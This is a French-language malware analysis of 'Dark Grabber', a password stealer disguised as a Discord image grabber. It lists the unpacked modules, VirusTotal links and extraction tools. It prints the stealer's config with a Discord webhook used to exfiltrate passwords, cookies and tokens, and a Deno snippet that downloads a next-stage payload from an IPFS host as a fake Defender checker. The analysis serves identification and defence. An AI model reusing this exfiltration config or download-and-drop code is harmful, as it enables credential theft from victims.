66 lines
2.7 KiB
Markdown
66 lines
2.7 KiB
Markdown
# Dark Grabber
|
|
|
|
C'est un password stealer qui se fait passer pour un "Image grabber discord", il est distribué par **! 刀3ズ GMB#3666** sur discord notamment.
|
|
|
|
Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
|
|
<br>
|
|
Les deux sont dans le même .zip et les admins demandent de les lancer les deux.
|
|
|
|
*insérer une capture*
|
|
|
|
## Version Normale
|
|
|
|
Elle est appelée "Install Dark Grabber.bin".
|
|
<br>
|
|
[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)<br>
|
|
C'est du Python 3.10 compilé avec pyinstaller.<br>
|
|
On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source.
|
|
<br>
|
|
On extrait les fichiers :
|
|
* antidebug.py
|
|
* browsers.py
|
|
* config.py
|
|
* discordtoken.py
|
|
* injection.py
|
|
* 'Install Dark Grabber'.py
|
|
* startup.py
|
|
* systeminfo.py
|
|
|
|
Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexes)
|
|
|
|
C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.
|
|
|
|
La config :
|
|
```Python
|
|
__CONFIG__ = {
|
|
'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
|
|
'antidebug': True,
|
|
'browsers': True,
|
|
'discordtoken': True,
|
|
'injection': True,
|
|
'startup': True,
|
|
'systeminfo': True }
|
|
```
|
|
|
|
## Version Debug
|
|
|
|
Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
|
|
<br>
|
|
[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f)
|
|
<br>
|
|
|
|
C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/).
|
|
<br>
|
|
On extrait le code ci dessous dans **main.ts** :
|
|
```typescript
|
|
import { download, Destination } from "https://deno.land/x/download/mod.ts";
|
|
|
|
await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
|
|
```
|
|
|
|
Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`.
|
|
|
|
`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.<br>
|
|
[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)<br>
|
|
Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka).
|